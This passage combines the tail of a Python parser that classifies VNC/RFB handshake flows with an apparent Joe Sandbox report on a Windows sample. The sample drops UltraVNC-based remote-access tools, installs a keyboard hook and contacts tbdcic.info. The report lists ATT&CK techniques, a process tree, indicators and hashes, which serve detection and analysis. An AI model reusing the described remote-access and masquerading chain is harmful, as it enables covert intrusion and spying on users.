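    ("r>i", b"\x11"),           # viewer selects it
]
FORWARD_FLOW = [
    ("r>i", b"RFB 003.003\n"),      # ordinary VNC: the responder on 5900 is the server
    ("i>r", b"RFB 003.003\n"),
    ("r>i", b"\x00\x00\x00\x02"),   # 3.3 encoding: U32 type 2 = VNC Authentication
]
_REASON = b"Too many security failures"
FAILED_FLOW = [
    ("r>i", b"RFB 003.008\n"),
    ("i>r", b"RFB 003.008\n"),
    ("r>i", b"\x00" + struct.pack("!I", len(_REASON)) + _REASON),
]
TLS_FLOW = [("i>r", b"\x16\x03\x01\x02\x00"), ("r>i", b"\x16\x03\x03"), ("i>r", b"\x14")]

if __name__ == "__main__":
    for name, flow, port in (("reverse", REVERSE_CONNECT_FLOW, 443), ("forward", FORWARD_FLOW, 5900),
                             ("failed", FAILED_FLOW, 5900), ("tls", TLS_FLOW, 443)):
        print(name, inspect_flow(flow, port))
```

The role decision rests on wire order, not on who opened the TCP connection: the sender of the first message is the RFB server. Feeding the parser the per-direction payloads concatenated would lose that ordering, so a capture tool should hand it messages in the order they were observed.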
MITRE ATT&CK Matrix (rebuilt per tactic from the flattened export, in the original top-to-bottom column order; a bracketed number is the badge the report places on a matched technique, entries without one are the unmatched cells of the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances

Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains

Initial Access: [1] Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools

Execution: [1] Windows Management Instrumentation; [2] Native API; [2] Command and Scripting Interpreter; [1] Scheduled Task/Job; [1] Service Execution; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript

Persistence: [1] DLL Side-Loading; [1] Valid Accounts; [11] Windows Service; [1] Scheduled Task/Job; [1] Bootkit; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

Privilege Escalation: [1] Exploitation for Privilege Escalation; [1] DLL Side-Loading; [1] Valid Accounts; [11] Access Token Manipulation; [11] Windows Service; [22] Process Injection; [1] Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd

Defense Evasion: [1] Disable or Modify Tools; [1] Deobfuscate/Decode Files or Information; [2] Obfuscated Files or Information; [1] Timestomp; [1] DLL Side-Loading; [231] Masquerading; [1] Valid Accounts; [1] Virtualization/Sandbox Evasion; [11] Access Token Manipulation; [22] Process Injection; [1] Bootkit

Credential Access: [121] Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture

Discovery: [2] System Time Discovery; [1] Account Discovery; [1] System Service Discovery; [4] File and Directory Discovery; [26] System Information Discovery; [31] Security Software Discovery; [1] Virtualization/Sandbox Evasion; [3] Process Discovery; [11] Application Window Discovery; [1] System Owner/User Discovery; System Network Connections Discovery

Lateral Movement: [1] Remote Desktop Protocol; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools

Collection: [1] Archive Collected Data; [1] Screen Capture; [121] Input Capture; [3] Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging

Command and Control: [1] Ingress Tool Transfer; [12] Encrypted Channel; [1] Remote Access Software; [1] Non-Application Layer Protocol; [2] Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol

Impact: [1] System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (ID 1579877)
Sample: Olz7TmvkEW.exe | Start date: 23/12/2024 | Architecture: WINDOWS | Score: 84

Contacted hosts: x1.i.lencr.org, tbdcic.info, bg.microsoft.map.fastly.net
Top-level signatures: Icon mismatch, binary includes an icon from a different legit application in order to fool users; Yara detected UltraVNC Hacktool; AI detected suspicious sample; 3 other signatures

Process tree (dropped files, signatures and network activity attached to the process they belong to):
Olz7TmvkEW.exe (started)
  dropped: C:\Users\user\AppData\Local\...\GIjul8.QTIrrr (PE32+)
  dropped: C:\Users\user\AppData\Local\...\sdABZ4.E1924R (PE32+)
  signature: Contains functionality to register a low level keyboard hook
  +- cmd.exe (started)
  |    dropped: C:\Windows\Tasks\sync_browser.exe (PE32+)
  |    dropped: C:\Windows\Tasks\conhost.exe (PE32+)
  |    signature: Drops executables to the windows directory (C:\Windows) and starts them
  |    +- sync_browser.exe (started)
  |    |    network: tbdcic.info 194.190.152.201:443 (local ports 49762, 49764), RSHB-ASRU, Russian Federation
  |    |    signature: Contains VNC / remote desktop functionality (version string found)
  |    +- Acrobat.exe (started)
  |    |    +- AcroCEF.exe (started)
  |    |         +- AcroCEF.exe (started)
  |    +- taskkill.exe (started)
  |    +- 14 other processes (started)
  +- cmd.exe (started)
  |    dropped: C:\Windows\Tasks\GIjul8.QTIrrr (PE32+)
  |    dropped: C:\Windows\Tasks\sdABZ4.E1924R (PE32+)
  |    +- conhost.exe (started)
  +- cmd.exe (started)
       +- conhost.exe (started)

Antivirus detection (initial sample and dropped files)
Source | Detection | Scanner
Olz7TmvkEW.exe | 3% | ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R | 0% | ReversingLabs
C:\Windows\Tasks\GIjul8.QTIrrr | 0% | ReversingLabs
C:\Windows\Tasks\conhost.exe | 0% | ReversingLabs
C:\Windows\Tasks\sdABZ4.E1924R | 0% | ReversingLabs
C:\Windows\Tasks\sync_browser.exe | 0% | ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tbdcic.info | 194.190.152.201 | true | false | (none) | high
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | (none) | high
x1.i.lencr.org | unknown | unknown | false | (none) | high
URLs
Name | Source | Malicious | Antivirus Detection | Reputation

http://www.uvnc.com
  Source: Olz7TmvkEW.exe (00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp), sync_browser.exe (00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp; 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp), GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr
  Malicious: false | Antivirus Detection: (none) | Reputation: high

http://x1.i.lencr.org/
  Source: 2D85F72862B55C4EADD9E66E06947F3D.12.dr
  Malicious: false | Antivirus Detection: (none) | Reputation: high

https://www.adobe.co
  Source: ReaderMessages.10.dr
  Malicious: false | Antivirus Detection: (none) | Reputation: high

http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
  Source: Olz7TmvkEW.exe (00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp), sync_browser.exe (00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp), GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr
  Malicious: false | Antivirus Detection: (none) | Reputation: high

http://www.uvnc.comopenhttp://forum.uvnc.comnet (concatenated string as extracted from memory)
  Source: Olz7TmvkEW.exe (00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp), sync_browser.exe (00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp), GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr
  Malicious: false | Antivirus Detection: (none) | Reputation: unknown

http://crl.thawte.com/ThawteTimestampingCA.crl0
  Source: Olz7TmvkEW.exe (00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp), GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr
  Malicious: false | Antivirus Detection: (none) | Reputation: high

http://java.sun.com/products/plugin/index.html#download
  Source: Olz7TmvkEW.exe (00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp), sync_browser.exe (00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp), GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr
  Malicious: false | Antivirus Detection: (none) | Reputation: high

http://forum.uvnc.com
  Source: Olz7TmvkEW.exe (00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp), sync_browser.exe (00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp; 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp), GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr
  Malicious: false | Antivirus Detection: (none) | Reputation: unknown

http://ocsp.thawte.com0
  Source: Olz7TmvkEW.exe (00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp), GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.dr
  Malicious: false | Antivirus Detection: (none) | Reputation: high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
194.190.152.201 | tbdcic.info | Russian Federation | 41615 | RSHB-ASRU | false
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1579877
                                                  Start date and time:2024-12-23 13:36:33 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 56s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Run name:Run with higher sleep bypass
Number of new started processes analysed:37
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Olz7TmvkEW.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651.exe
                                                  Detection:MAL
                                                  Classification:mal84.troj.spyw.evad.winEXE@56/60@4/1
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 34.237.241.83, 18.213.11.84, 54.224.241.105, 50.16.47.176, 23.195.39.65, 2.19.198.27, 23.32.239.56, 184.30.20.134, 199.232.214.172, 13.107.246.63, 23.218.208.109, 4.245.163.56
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: Olz7TmvkEW.exe
                                                  No simulations
Context (other analyses sharing an indicator with this sample)
Match | Associated Sample Name / URL | Detection | Threat Name | Context

IPs
194.190.152.201 | 7q551ugrWe.exe | malicious | UltraVNC
194.190.152.201 | T8xrZb7nBL.exe | malicious | UltraVNC
194.190.152.201 | mSRW5AfJpC.exe | malicious | UltraVNC

Domains
tbdcic.info | 7q551ugrWe.exe | malicious | UltraVNC | 194.190.152.201
tbdcic.info | T8xrZb7nBL.exe | malicious | UltraVNC | 194.190.152.201
tbdcic.info | mSRW5AfJpC.exe | malicious | UltraVNC | 194.190.152.201
bg.microsoft.map.fastly.net | q8b3OisMC4.dll | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 7q551ugrWe.exe | malicious | UltraVNC | 199.232.210.172
bg.microsoft.map.fastly.net | T8xrZb7nBL.exe | malicious | UltraVNC | 199.232.210.172
bg.microsoft.map.fastly.net | mSRW5AfJpC.exe | malicious | UltraVNC | 199.232.214.172
bg.microsoft.map.fastly.net | eszstwQPwq.ps1 | malicious | LockBit ransomware, Metasploit | 199.232.210.172
bg.microsoft.map.fastly.net | 0vM02qWRT9.ps1 | malicious | LockBit ransomware, Metasploit | 199.232.210.172
bg.microsoft.map.fastly.net | #U5b89#U88c5#U52a9#U624b_2.0.8.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | fiFdIrd.txt.js | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 5XXofntDiN.exe | malicious | LummaC | 199.232.210.172

ASNs
RSHB-ASRU | 7q551ugrWe.exe | malicious | UltraVNC | 194.190.152.201
RSHB-ASRU | T8xrZb7nBL.exe | malicious | UltraVNC | 194.190.152.201
RSHB-ASRU | mSRW5AfJpC.exe | malicious | UltraVNC | 194.190.152.201
RSHB-ASRU | Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnk | malicious | Reverse SSH | 194.190.152.129
RSHB-ASRU | Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnk | malicious | Reverse SSH | 194.190.152.129
RSHB-ASRU | document.jpg.lnk | malicious | Reverse SSH | 194.190.152.129
RSHB-ASRU | tiago.exe | malicious | Reverse SSH | 194.190.152.129
RSHB-ASRU | 0EZ9Ho3Ruc.exe | malicious | RedLine | 194.190.152.148
RSHB-ASRU | Paralysis Hack.exe | malicious | zgRAT | 194.190.153.137

No context

Dropped files
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R | 7q551ugrWe.exe | malicious | UltraVNC
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R | T8xrZb7nBL.exe | malicious | UltraVNC
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R | mSRW5AfJpC.exe | malicious | UltraVNC
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr | 7q551ugrWe.exe | malicious | UltraVNC
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr | T8xrZb7nBL.exe | malicious | UltraVNC
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr | mSRW5AfJpC.exe | malicious | UltraVNC
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):300
                                                                    Entropy (8bit):5.223509277357721
                                                                    Encrypted:false
                                                                    SSDEEP:6:4gGHN+q2PcNwi2nKuAl9OmbnIFUt8d9ZZmw+d9NVkwOcNwi2nKuAl9OmbjLJ:4DovLZHAahFUt8dP/+dd54ZHAaSJ
                                                                    MD5:43AC002CEE10B8F6A540E68B6162B091
                                                                    SHA1:4E337DB1906A565620FFFFFE2E7B0DC50767C6B5
                                                                    SHA-256:203D85F211301464D4CF9EC41FF0EC9F4A2FC1E7051E649E3C896147CC8DA3F8
                                                                    SHA-512:1AC2837C551CBD881EF5827B3ED4395098345C2556B204F0D8571BBCE99C84BAD6756540A5BDDC51C20DE1BED83313C04DD35C349E58D9B3D3CDD4991DCDBC77
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.150 1cc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:37:37.152 1cc8 Recovering log #3.2024/12/23-07:37:37.152 1cc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):300
                                                                    Entropy (8bit):5.223509277357721
                                                                    Encrypted:false
                                                                    SSDEEP:6:4gGHN+q2PcNwi2nKuAl9OmbnIFUt8d9ZZmw+d9NVkwOcNwi2nKuAl9OmbjLJ:4DovLZHAahFUt8dP/+dd54ZHAaSJ
                                                                    MD5:43AC002CEE10B8F6A540E68B6162B091
                                                                    SHA1:4E337DB1906A565620FFFFFE2E7B0DC50767C6B5
                                                                    SHA-256:203D85F211301464D4CF9EC41FF0EC9F4A2FC1E7051E649E3C896147CC8DA3F8
                                                                    SHA-512:1AC2837C551CBD881EF5827B3ED4395098345C2556B204F0D8571BBCE99C84BAD6756540A5BDDC51C20DE1BED83313C04DD35C349E58D9B3D3CDD4991DCDBC77
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.150 1cc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:37:37.152 1cc8 Recovering log #3.2024/12/23-07:37:37.152 1cc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):344
                                                                    Entropy (8bit):5.162535692089053
                                                                    Encrypted:false
                                                                    SSDEEP:6:uq2PcNwi2nKuAl9Ombzo2jMGIFUt8xXZmw+wtkwOcNwi2nKuAl9Ombzo2jMmLJ:uvLZHAa8uFUt8d/+wt54ZHAa8RJ
                                                                    MD5:60D47923D892872098BE9135B8B4AD4B
                                                                    SHA1:E4836F1E63364DC29FE14DF6334534559C7E73A5
                                                                    SHA-256:C9D9878F634E13187117BAC449431BED703986998205443D3A94512AEDEDC3FD
                                                                    SHA-512:1316EFA7B625CBE975A489D0C46D95234D0DCE20B4BD5653F36D1CF68B99F250016996FC4EAFCCD8D759598CB5D0BB57CD36683591DE474F8AEAA83DBDD4C592
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.241 1df0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:37:37.242 1df0 Recovering log #3.2024/12/23-07:37:37.243 1df0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):344
                                                                    Entropy (8bit):5.162535692089053
                                                                    Encrypted:false
                                                                    SSDEEP:6:uq2PcNwi2nKuAl9Ombzo2jMGIFUt8xXZmw+wtkwOcNwi2nKuAl9Ombzo2jMmLJ:uvLZHAa8uFUt8d/+wt54ZHAa8RJ
                                                                    MD5:60D47923D892872098BE9135B8B4AD4B
                                                                    SHA1:E4836F1E63364DC29FE14DF6334534559C7E73A5
                                                                    SHA-256:C9D9878F634E13187117BAC449431BED703986998205443D3A94512AEDEDC3FD
                                                                    SHA-512:1316EFA7B625CBE975A489D0C46D95234D0DCE20B4BD5653F36D1CF68B99F250016996FC4EAFCCD8D759598CB5D0BB57CD36683591DE474F8AEAA83DBDD4C592
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.241 1df0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:37:37.242 1df0 Recovering log #3.2024/12/23-07:37:37.243 1df0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):475
                                                                    Entropy (8bit):4.967403857886107
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sq71jEhsBdOg2H9CTTfcaq3QYiubSpDyP7E4TX:Y2sRdsqvdMH4u3QYhbSpDa7n7
                                                                    MD5:094BB3083CDB1DAC0A08BF9F0EB28C14
                                                                    SHA1:FE55EC77FC56E177E62CCE9C553182AA8399C45B
                                                                    SHA-256:0022675C014614DA106CE184F84EEE384C39F3A7BA3D2CAF4F621490B4B80652
                                                                    SHA-512:16A27F1722CB2359F9756145549F181A8C18FADFF1927AC85D2DF008AF0272A928C01E89BC6125323F4E62ECB16EB4865FA63E9A8626EE2A6F321996DA887AF0
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517466892184","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":635266},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:modified
                                                                    Size (bytes):475
                                                                    Entropy (8bit):4.967403857886107
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sq71jEhsBdOg2H9CTTfcaq3QYiubSpDyP7E4TX:Y2sRdsqvdMH4u3QYhbSpDa7n7
                                                                    MD5:094BB3083CDB1DAC0A08BF9F0EB28C14
                                                                    SHA1:FE55EC77FC56E177E62CCE9C553182AA8399C45B
                                                                    SHA-256:0022675C014614DA106CE184F84EEE384C39F3A7BA3D2CAF4F621490B4B80652
                                                                    SHA-512:16A27F1722CB2359F9756145549F181A8C18FADFF1927AC85D2DF008AF0272A928C01E89BC6125323F4E62ECB16EB4865FA63E9A8626EE2A6F321996DA887AF0
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517466892184","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":635266},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4099
                                                                    Entropy (8bit):5.23628300409856
                                                                    Encrypted:false
                                                                    SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPh3y33hc:CwNw1GHqPySfkcigoO3h28ytPh3y3Rc
                                                                    MD5:BF006230DED78736DA53AE00B6B115BB
                                                                    SHA1:6F141BF859F20081E58C20B690E895282D058614
                                                                    SHA-256:9B46592FDAE6C2BBDADD98A34CC2997B0E400EC5FA7FEA33255156696D588B92
                                                                    SHA-512:52AD27DC0C23B009959B0B39FE4DB67A51CE465C499E1879A8CD9E9EA8D5B9A451508875EDC816CB241D6BE3461D899A61C01EB52D2EDDD773F04D30BDBFF8D4
                                                                    Malicious:false
                                                                    Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):332
                                                                    Entropy (8bit):5.215436209346717
                                                                    Encrypted:false
                                                                    SSDEEP:6:6q2PcNwi2nKuAl9OmbzNMxIFUt8YZmw+37kwOcNwi2nKuAl9OmbzNMFLJ:6vLZHAa8jFUt8Y/+3754ZHAa84J
                                                                    MD5:C52B0782351F316DA9E884236EA1DA66
                                                                    SHA1:19FEFC98D10F2CA74784F9D162ADA6A8B932E495
                                                                    SHA-256:374701C8FA8B39A52FA4F3A66F8B35BA2067C988DD7420CE5C82516EC1760F51
                                                                    SHA-512:1AD74F24A56FAAF5CF3E79253A4E42AE271E325E3C4A75050889CA4E760F046073845FEB4EF1D21AF0D35461FF63C1B3429C5FB685DF7C9D6F90C4D1A26088B2
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.663 1df0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:37:37.674 1df0 Recovering log #3.2024/12/23-07:37:37.691 1df0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                    Category:dropped
                                                                    Size (bytes):66934
                                                                    Entropy (8bit):2.436424201832609
                                                                    Encrypted:false
